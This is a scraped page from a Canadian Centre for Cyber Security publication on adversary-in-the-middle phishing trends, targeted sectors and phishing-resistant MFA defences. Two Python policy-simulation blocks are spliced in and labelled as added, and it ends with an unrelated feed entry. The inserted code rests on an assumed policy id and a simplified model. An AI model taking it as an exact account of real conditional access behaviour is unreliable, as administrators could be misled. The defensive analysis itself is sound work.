title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 
0%</li> <li>July 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>August 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: NIL; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: NIL</li> <li>September 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>November 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>December 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>January 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>February 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>March 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>April 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>May 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>June 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 86%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 14%</li> <li>July 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 42%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 58%</li> <li>August 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr 
title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>September 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>October 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 33%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 67%</li> <li>November 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 10%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 90%</li> <li>December 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>January 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>February 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 33%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 67%</li> <li>March 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 10%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 90%</li> <li>April 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>May 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 16%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 84%</li> <li>June 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 12%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 88%</li> </ul></details></div> </div> <p>One major contributor to this shift was threat actors’ use of a particular proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kit. 
For more information on this kit, refer to the Field Effect article <a href="https://fieldeffect.com/blog/field-effect-discovers-m365-adversary-in-the-middle-campaign">Field Effect discovers M365 adversary-in-the-middle campaign</a>.</p> <p>Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> continues to prevent <abbr title="adversary-in-the-middle">AitM</abbr> campaigns, whether from traditional kits or proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits. Both phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> and registered device <abbr title="conditional access policies">CAPs</abbr> break the authentication flow when there is an <abbr title="adversary-in-the-middle">AitM</abbr> phishing kit in the middle of the connection.</p> <h2 class="text-info" id="3">Adversary-in-the-middle phishing trends and techniques</h2> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing kits are increasingly sophisticated and challenging to detect. It might seem logical to focus on stopping these campaigns at their source by enhancing phishing email filtering. 
However, threat actors know that organizations are constantly improving their phishing protection programs and are therefore adjusting their techniques.</p> <p>The Cyber Centre analyzed over 100 campaigns between 2023 and early 2025 and found that threat actors used a combination of vendor email compromise (VEC), which is a type of business email compromise (BEC), and a phishing technique that uses living off trusted sites (LOTS).</p> <h3 id="3.1">Business email compromise phishing campaigns</h3> <p>In <abbr title="business email compromise">BEC</abbr> phishing campaigns, threat actors compromise legitimate organizations, steal their trusted contacts, and send <abbr title="adversary-in-the-middle">AitM</abbr> phishing emails with links to legitimate services like SharePoint, Dropbox, or other trusted hosting providers. The files hosted on these trusted providers contain a link to the <abbr title="adversary-in-the-middle">AitM</abbr> phishing site, but the link is within a file hosted on the trusted provider, not in the phishing email itself. This makes detecting and tracking the source of an <abbr title="adversary-in-the-middle">AitM</abbr> compromise more difficult.</p> <p>From the user’s perspective, they have received an email from a trusted contact with a shared file, which they may regularly receive from this contact. 
Threat actors can tailor the file-sharing service based on previous communications between 2 users to make their <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns more difficult to identify.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 3: Distribution of <abbr title="business email compromise">BEC</abbr> phishing</figcaption><img alt="Figure 3 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig3-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 3: Distribution of <abbr title="business email compromise">BEC</abbr> phishing</summary><p>This pie chart shows the distribution of <abbr title="business email compromise">BEC</abbr> phishing campaigns compared to non-<abbr title="business email compromise">BEC</abbr> phishing campaigns that the Cyber Centre analyzed and categorized between 2023 and mid-2025. <abbr title="business email compromise">BEC</abbr> phishing campaigns made up 91% of the analyzed campaigns.</p> </details></div> </div> <h3 id="3.2">Living off trusted sites techniques</h3> <p><abbr title="living off trusted sites">LOTS</abbr>-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing made up over half of the campaigns that the Cyber Centre was able to categorize, with the remaining campaigns using conventional phishing methods (such as malicious links or attachments directly in an email). 
Organizations should educate users on the risks of <abbr title="living off trusted sites">LOTS</abbr>-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns and provide training on how to identify these campaigns.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 4: Distribution of phishing techniques</figcaption><img alt="Figure 4 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig4-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 4: Distribution of phishing techniques</summary><p>This pie chart shows the distribution of phishing techniques that the Cyber Centre analyzed and categorized between 2023 and mid-2025. <abbr title="living off trusted sites">LOTS</abbr> made up 59% of the analyzed campaigns while conventional phishing (such as embedded links or files) made up 41%.</p> </details></div> </div> <h2 class="text-info" id="4">Targeted sectors</h2> <p>The Cyber Centre examined the sectors and organizations that are being targeted by <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns. In Figure 5 below, the breakdown of <abbr title="business email compromise">BEC</abbr> victims by country shows that most of the organizations that were compromised and that sent <abbr title="adversary-in-the-middle">AitM</abbr> phishing emails to the Government of Canada and to critical infrastructure partners were based in Canada. 
This finding underscores that threat actors are leveraging <abbr title="vendor email compromise">VEC</abbr> since many Canadian organizations predominantly interact with other Canadian organizations in their daily operations.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 5: Breakdown of <abbr title="business email compromise">BEC</abbr> victims by country</figcaption><img alt="Figure 5 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig5-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 5: Breakdown of <abbr title="business email compromise">BEC</abbr> victims by country</summary><p>This pie chart shows the breakdown of <abbr title="business email compromise">BEC</abbr> victims by country that the Cyber Centre analyzed and categorized between 2023 and mid-2025. Canada represents 77%, the United States represents 18%, and the remaining 5% is divided among other unspecified countries.</p> </details></div> </div> <p>The Cyber Centre found that a third of the <abbr title="business email compromise">BEC</abbr> victims were in the natural resources, energy, and environment sector. This was closely followed by the industry and business development sector and the Indigenous services sector.</p> <p>When examining the victims who received <abbr title="adversary-in-the-middle">AitM</abbr> phishing emails, the Cyber Centre observed a similar breakdown. A quarter of the victims were in the natural resources, energy, and environment sector, followed by the security, intelligence and defence sector; the health sector; and the government administration sector.</p> <p>The Cyber Centre can correlate the sectors affected by <abbr title="business email compromise">BEC</abbr> and those impacted by <abbr title="adversary-in-the-middle">AitM</abbr> phishing to spot patterns between the sectors sending and receiving emails. 
We observed that 41% of sectors impacted by <abbr title="business email compromise">BEC</abbr> also sent phishing emails to organizations within the same sector, consistent with previously cited <abbr title="vendor email compromise">VEC</abbr> findings. The graph below illustrates an example of this. Notable exceptions to this trend were the hospitality and legal sectors, likely because hotels and law firms serve clients across diverse sectors.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 6: <abbr title="business email compromise">BEC</abbr> victims in the natural resources, energy and environment sector sending emails to <abbr title="adversary-in-the-middle">AitM</abbr> phishing victims</figcaption><img alt="Figure 6 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig6-itsm.30.031-e_2.png" /></figure><details><summary>Long description – Figure 6: <abbr title="business email compromise">BEC</abbr> victims in the natural resources, energy and environment sector sending emails to <abbr title="adversary-in-the-middle">AitM</abbr> phishing victims</summary><p>The figure depicts <abbr title="business email compromise">BEC</abbr> victims in the natural resources, energy and environment sector sending emails to <abbr title="adversary-in-the-middle">AitM</abbr> phishing victims. This is based on results that the Cyber Centre analyzed and categorized between 2023 and mid-2025. 
The natural resources, energy and environment sector sent 55% of phishing emails within its sector, 13% to the health sector, 9% to the transportation sector, 5% to the banking and finance sector, 5% to the security, intelligence and defence sector, 5% to the government administration sector, 4% to the border services and immigration sector, and 4% to the international affairs, trade and development sector.</p> </details></div> </div> <section><h2 class="text-info" id="5">The importance of phishing-resistant multi-factor authentication</h2> <p>Although <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns are widespread, a solution already exists to mitigate all known campaigns: phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. This is the only way to completely stop these campaigns before a threat actor can get hold of an <abbr title="multi-factor authentication">MFA</abbr>-verified session.</p> <p>According to the Cyber Centre’s findings, full-session compromises within the Government of Canada and critical infrastructure partners have decreased over the last few years. This is primarily because these organizations have adopted registered device <abbr title="conditional access policies">CAPs</abbr> and other <abbr title="conditional access policies">CAPs</abbr> requiring phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> and have implemented strictly controlled <abbr title="internet protocol">IP</abbr> restrictions on logins. 
Full-session compromises decreased from a high of almost 20% at the end of the third quarter of 2023 to less than 10% of all compromises as of early 2025.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 7: Cumulative percentage of <abbr title="adversary-in-the-middle">AitM</abbr> phishing results over time</figcaption><img alt="Figure 7 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig7-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 7: Cumulative percentage of <abbr title="adversary-in-the-middle">AitM</abbr> phishing results over time</summary><p>This bar graph illustrates the cumulative percentage of <abbr title="adversary-in-the-middle">AitM</abbr> phishing results that the Cyber Centre analyzed and categorized between 2023 and mid-2025.</p> <ul><li>2023 Q1: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 55.6%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 33.3%; full session compromise: 11.1%</li> <li>2023 Q2: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 55%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 35%; full session compromise: 10%</li> <li>2023 Q3: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 47.8%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 34.8%; full session compromise: 17.4%</li> <li>2023 Q4: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 50%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 33.3%; full session compromise: 16.7%</li> <li>2024 Q1: Blocked: <abbr title="multi-factor 
authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 50%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 35.3%; full session compromise: 14.7%</li> <li>2024 Q2: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 51.2%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 34.9%; full session compromise: 14%</li> <li>2024 Q3: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 38.9%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 48.6%; full session compromise: 12.5%</li> <li>2024 Q4: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 38.4%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 51.5%; full session compromise: 10.1%</li> <li>2025 Q1: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 35.9%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 57%; full session compromise: 7%</li> <li>2025 Q2: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 35.9%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 58%; full session compromise: 6.1%</li> </ul></details></div> </div> <p>The Cyber Centre continues to observe a steady stream of <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns stemming from <abbr title="business email compromise">BEC</abbr>. 
This indicates that threat actors remain confident that enough accounts lack phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> protection, making <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns a worthwhile technique for compromising accounts.</p> </section><section><h2 class="text-info" id="6">Enhancing defences against evolving adversary-in-the-middle threats</h2> <p>Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> can prevent <abbr title="adversary-in-the-middle">AitM</abbr> campaigns, but it can be difficult for organizations to implement. Cloud configuration can also be challenging, and most phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> methods are fee-based.</p> <p>Organizations should weigh the risk and impact of cyber incidents against the cost of implementing phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. 
Organizations that choose to implement phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> should consider the following:</p> <ul><li>Compared with the cost of remediating and recovering from a data breach, providing phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> methods (FIDO2 security keys, passkeys, Windows Hello for Business) to users is a cost-effective investment</li> <li>Data and information may be critical to business operations or contain highly sensitive private information, and any compromise can have a significant impact and cost for the organization</li> <li>An identity compromise can have a significant impact on an organization’s reputation</li> </ul><p>Some organizations are moving to devices that are registered with their <abbr title="information technology">IT</abbr> departments and phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. However, threat actors are often a step ahead and launch <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns before organizations can move to phishing-resistant options.</p> <h3 id="6.1">Addressing high-risk gaps and vulnerabilities</h3> <p>Organizations should deploy phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> to every user, without exception. They should also review their identity protection posture and flag any high-risk gaps or vulnerabilities. The following are examples of high-risk gaps or vulnerabilities that organizations should address immediately to prevent <abbr title="adversary-in-the-middle">AitM</abbr> compromises.</p> <h4>Administrators using weak <abbr title="multi-factor authentication">MFA</abbr> methods</h4> <p>Organizations should apply phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> to all administrator accounts, without exception, in any <abbr title="conditional access policy">CAP</abbr>. 
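An added example, not from the Cyber Centre publication and not Microsoft's policy engine, that simulates whether a session relayed by an AitM kit would satisfy a set of conditional access policies: it covers the administrator gap described here, the BYOD, backup-method and exception cases the publication also raises, and each of the three CAP mitigations listed earlier. The policy dicts borrow field names from the Microsoft Graph conditionalAccessPolicy resource in simplified form; the built-in phishing-resistant authentication strength id is an assumption to verify in your tenant.

```python
"""Would an AitM-relayed session satisfy a tenant's conditional access policies?

Constructed example, not Cyber Centre code and not Microsoft's policy engine.
Policy dicts borrow field names from the Microsoft Graph conditionalAccessPolicy
resource but are evaluated by a deliberately simplified model. The built-in
authentication strength id for phishing-resistant MFA is an assumption: verify
it in your own tenant before relying on it.
"""
PHISHING_RESISTANT_STRENGTH_ID = "00000000-0000-0000-0000-000000000004"  # assumed

# Factors a kit in the middle can relay from the victim, versus factors bound to
# the origin (FIDO2 keys, passkeys, Windows Hello for Business) that it cannot.
RELAYABLE = {"password", "sms", "voice", "push", "totp"}
PHISHING_RESISTANT = {"fido2", "passkey", "whfb"}


def _applies(policy, s):
    """Does an enabled policy cover sign-in scenario s?"""
    if policy["state"] != "enabled":
        return False
    u = policy["conditions"]["users"]
    roles = set(s["roles"])
    included = ("All" in u.get("includeUsers", [])
                or s["user"] in u.get("includeUsers", [])
                or bool(roles & set(u.get("includeRoles", []))))
    excluded = (s["user"] in u.get("excludeUsers", [])
                or bool(roles & set(u.get("excludeRoles", []))))
    if not included or excluded:
        return False
    loc = policy["conditions"].get("locations")
    if loc and s["trusted_location"] and "AllTrusted" in loc.get("excludeLocations", []):
        return False  # policy is scoped to sign-ins outside the trusted IP ranges
    return True


def _control_met(control, s):
    if control == "mfa":  # any second factor, relayable ones included
        return bool(s["methods"] - {"password"})
    if control in ("compliantDevice", "domainJoinedDevice"):
        return s["registered_device"]
    if control == "phishingResistantStrength":
        return bool(s["methods"] & PHISHING_RESISTANT)
    raise ValueError(f"unmodelled control {control!r}")


def _satisfied(policy, s):
    g = policy["grantControls"]
    controls = list(g.get("builtInControls", []))
    if (g.get("authenticationStrength") or {}).get("id") == PHISHING_RESISTANT_STRENGTH_ID:
        controls.append("phishingResistantStrength")
    if "block" in controls:
        return False
    met = [_control_met(c, s) for c in controls]
    return any(met) if g.get("operator", "OR") == "OR" else all(met)


def allowed(policies, s):
    """True if every applicable policy is satisfied (no applicable policy: allowed)."""
    return all(_satisfied(p, s) for p in policies if _applies(p, s))


def aitm_view(victim):
    """What the kit can present: the victim's relayable factors only, from the
    actor's own unregistered device outside the organization's IP space."""
    return {**victim, "methods": victim["methods"] & RELAYABLE,
            "registered_device": False, "trusted_location": False}


def aitm_exposure(policies, victims):
    """Return {user: 'exposed' | 'protected'} for each victim scenario."""
    return {v["user"]: "exposed" if allowed(policies, aitm_view(v)) else "protected"
            for v in victims}


# Weak baseline: "require MFA" accepts push/SMS, and a service account is excluded.
WEAK_MFA_WITH_EXCEPTION = {
    "displayName": "Require MFA for all users", "state": "enabled",
    "conditions": {"users": {"includeUsers": ["All"],
                             "excludeUsers": ["svc-legacy@corp.example"]}},
    "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}}
# The publication's three mitigations, one policy each.
PHISHING_RESISTANT_ALL = {
    "displayName": "Baseline: phishing-resistant MFA, no exceptions", "state": "enabled",
    "conditions": {"users": {"includeUsers": ["All"]}},
    "grantControls": {"operator": "OR", "builtInControls": [],
                      "authenticationStrength": {"id": PHISHING_RESISTANT_STRENGTH_ID}}}
ADMIN_REGISTERED_DEVICE = {
    "displayName": "Admins: registered device only", "state": "enabled",
    "conditions": {"users": {"includeRoles": ["Global Administrator"]}},
    "grantControls": {"operator": "OR", "builtInControls": ["compliantDevice"]}}
CORPORATE_IP_ONLY = {
    "displayName": "Block sign-ins outside corporate IP space", "state": "enabled",
    "conditions": {"users": {"includeUsers": ["All"]},
                   "locations": {"includeLocations": ["All"], "excludeLocations": ["AllTrusted"]}},
    "grantControls": {"operator": "OR", "builtInControls": ["block"]}}

VICTIMS = [  # constructed scenarios; the kit relays whatever weak factor each user has
    {"user": "admin@corp.example", "roles": ["Global Administrator"],
     "methods": {"password", "push"}, "registered_device": True, "trusted_location": True},
    {"user": "byod@corp.example", "roles": [], "methods": {"password", "sms"},
     "registered_device": False, "trusted_location": False},
    {"user": "svc-legacy@corp.example", "roles": [], "methods": {"password"},
     "registered_device": False, "trusted_location": False},
    {"user": "keyholder@corp.example", "roles": [],  # FIDO2 plus push kept as a backup
     "methods": {"password", "fido2", "push"}, "registered_device": True, "trusted_location": True},
]
```

Under the weak baseline every scenario is exposed, including the FIDO2 user whose push backup the kit simply relays and the excluded service account; each of the three mitigating policies closes the relay path for the users it covers.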
Additionally, organizations should remove any non-phishing-resistant backup methods on these accounts since these could be bypassed by <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns.</p> <h4>Bring-your-own-device without phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> or location restrictions</h4> <p>Threat actors’ primary targets are users who are allowed to sign in from their own devices, outside of an organization’s controlled <abbr title="internet protocol">IP</abbr> space and without phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. This is a very high-risk gap that organizations should address immediately.</p> <p>If organizations require users to use personal devices (known as bring your own device [BYOD]), they should deploy phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> and ensure that users cannot use any weak fallback methods. Alternatively, organizations could require all BYOD logins to go through the organization’s corporate VPN, with an accompanying <abbr title="conditional access policy">CAP</abbr> that restricts logins to only that specific <abbr title="internet protocol">IP</abbr> space.</p> <p>The greatest challenge is avoiding the temptation to make exceptions for specific users, groups or applications. As a baseline, all users should have phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> by default and without exception.</p> <h3 id="6.2">Educating employees</h3> <p>Organizations should also train their employees on how to spot and report <abbr title="adversary-in-the-middle">AitM</abbr> campaigns. Many users will open emails and click on the included links if the email is from a trusted source. 
Organizations should consider including the following topics in their training on phishing campaigns.</p> <h4><abbr title="business email compromise">BEC</abbr> scenarios</h4> <p>The more users are aware of how common <abbr title="business email compromise">BEC</abbr> campaigns are, the more they will be on the lookout for them. Before clicking on a link in an email, they should know to ask themselves a couple of questions, such as:</p> <ul><li>Do I usually receive unsolicited Dropbox files from this contact?</li> <li>Does this contact usually send me SharePoint documents?</li> </ul><p>If a user receives unsolicited files, they should reach out to the sender through another method (for example, a phone call) to confirm that the document was shared intentionally.</p> <h4>Double-checking the URL when signing into login services</h4> <p>Verifying the legitimacy of URLs can be difficult since logins to some sites like Microsoft Entra ID contain long URLs, so users might not notice a suspicious domain in the path. Educating users on where to find the top-level domain within a URL and what domains to expect in that location can go a long way in stopping these campaigns.</p> <h4>Avoiding multiple logins</h4> <p>Users often sign into their accounts using a cloud-based identity and access management service like Microsoft Entra ID. This allows them to access applications like Microsoft SharePoint or Teams with a single sign-on. If users know that they shouldn’t need to log in again to access applications or a shared file, they will think twice before re-entering their credentials.</p> <p>Another helpful technique is to teach users to open a new tab and sign into the file-sharing service directly before clicking on a link. After logging into the service directly, users should not be prompted to sign in again when they click the file link in their email. 
If they do receive a prompt, it could be an <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaign.</p> <h4>Good password hygiene</h4> <p>Even if users know how to spot <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns, there will always be some successful campaigns that trick users into supplying their username and password before the campaigns are blocked by <abbr title="conditional access policies">CAPs</abbr>. This means that the threat actor can gain control of the user’s username and password, even if they did not get an <abbr title="multi-factor authentication">MFA</abbr>-verified session. Therefore, organizations must remind users to not reuse passwords. Once a threat actor obtains these credentials, they can use them against other login portals within the organization that might not have <abbr title="multi-factor authentication">MFA</abbr> protections (for example, legacy web portals or less secure VPN appliances).</p> </section></section><section><h2 class="text-info" id="7">Summary</h2> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns are becoming more sophisticated and are occurring across all sectors. As this publication highlights, there are a number of measures organizations can take to mitigate this threat. 
However, the best defence against <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns is to implement phishing-resistant MFA by default and without exception.</p> <p>For additional cyber security guidance, please refer to the following:</p> <ul><li><a href="/en/guidance/foundational-cyber-security-actions-small-organizations-itsap10300">Foundational cyber security actions for small organizations (ITSAP.10.300)</a></li> <li><a href="/en/guidance/offer-tailored-cyber-security-training-your-employees-itsap10093">Offer tailored cyber security training to your employees (ITSAP.10.093)</a></li> <li><a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP.30.030)</a></li> </ul></section></div> </div> </div> </div> </div> </article>
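The BYOD control described in the section above (phishing-resistant MFA for every sign-in, or, as the alternative the text offers, BYOD sign-ins restricted to the corporate VPN IP space) can be expressed as a small policy evaluator and run over sign-in records. This is an added example, not code from the Cyber Centre publication; the IP ranges, method labels, record layout and sample events are all constructed assumptions.

```python
"""Evaluate sign-in records against the BYOD conditional access logic described above.

Added example (not from the Cyber Centre publication). The IP ranges, method names,
record layout and sample events are constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass

# Constructed stand-in for the "corporate VPN IP space" that a CAP would reference
# through a named location; both prefixes are documentation (TEST-NET) ranges.
CORPORATE_VPN_RANGES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("198.51.100.0/25"),
]

# Assumed method labels. Phishing-resistant methods bind the credential to the
# site origin, so a credential relayed through a proxy page does not validate.
PHISHING_RESISTANT = {"fido2", "certificate"}
# Weak fallback methods: a relay can forward the code or trigger the prompt.
WEAK_FALLBACK = {"sms", "voice", "totp", "push"}


@dataclass(frozen=True)
class SignIn:
    user: str
    source_ip: str
    device_managed: bool      # False = bring-your-own-device
    methods: tuple            # authentication methods completed in this sign-in
    exempt: bool = False      # a per-user/group exception, the gap the text warns about


def in_corporate_space(ip: str) -> bool:
    """True when the source address falls inside the corporate VPN ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CORPORATE_VPN_RANGES)


def completed_phishing_resistant(methods) -> bool:
    return any(m in PHISHING_RESISTANT for m in methods)


def evaluate(signin: SignIn, byod_via_vpn: bool = False) -> tuple:
    """Return ("allow" | "block", reason) for one sign-in.

    Baseline: every sign-in must complete a phishing-resistant method. When
    byod_via_vpn is True, BYOD sign-ins may instead satisfy the location
    restriction (corporate VPN IP space), the alternative the text describes.
    """
    if signin.exempt:
        # Exceptions bypass the control entirely; audit() surfaces them.
        return ("allow", "policy exception in effect")
    if completed_phishing_resistant(signin.methods):
        return ("allow", "phishing-resistant MFA completed")
    if byod_via_vpn and not signin.device_managed:
        if in_corporate_space(signin.source_ip):
            return ("allow", "BYOD sign-in from corporate VPN IP space")
        return ("block", "BYOD sign-in outside corporate VPN IP space")
    weak = sorted(set(signin.methods) & WEAK_FALLBACK)
    if weak:
        return ("block", "only weak fallback MFA completed: " + ",".join(weak))
    return ("block", "no MFA completed")


def audit(signins, byod_via_vpn: bool = False) -> dict:
    """Summarise a batch: blocked events and users relying on exceptions."""
    blocked, exceptions = [], []
    for s in signins:
        verdict, reason = evaluate(s, byod_via_vpn)
        if verdict == "block":
            blocked.append((s.user, s.source_ip, reason))
        elif s.exempt:
            exceptions.append(s.user)
    return {"blocked": blocked, "exceptions": sorted(set(exceptions))}


# Constructed sample sign-ins (not real telemetry).
SAMPLE = [
    SignIn("alice", "192.0.2.10", False, ("password", "fido2")),
    SignIn("bob", "192.0.2.77", False, ("password", "sms")),   # weak fallback, outside corporate space
    SignIn("carol", "192.0.2.77", False, ("password", "totp"), exempt=True),
    SignIn("dave", "203.0.113.45", False, ("password", "push")),
]

if __name__ == "__main__":
    for s in SAMPLE:
        print(s.user, evaluate(s))
    print(audit(SAMPLE, byod_via_vpn=True))
```

Running the batch in both modes shows why the text calls exceptions the greatest challenge: carol's sign-in is allowed under either mode for no reason other than the exemption flag.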

  • Protecting specified information in non-Government of Canada systems and organizations (ITSP.10.171)
    by Canadian Centre for Cyber Security on October 28, 2025 at 6:41 pm

    <article data-history-node-id="6144" about="/en/guidance/protecting-specified-information-non-government-canada-systems-and-organizations-itsp10171" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>October 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.10.171</strong></p> </div> <!--pdf download--> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsp.10.171-e_1.pdf">Protecting specified information in non-Government of Canada systems and organizations – ITSP.10.171 (PDF, 2.5 MB)</a></p> </div> <h2 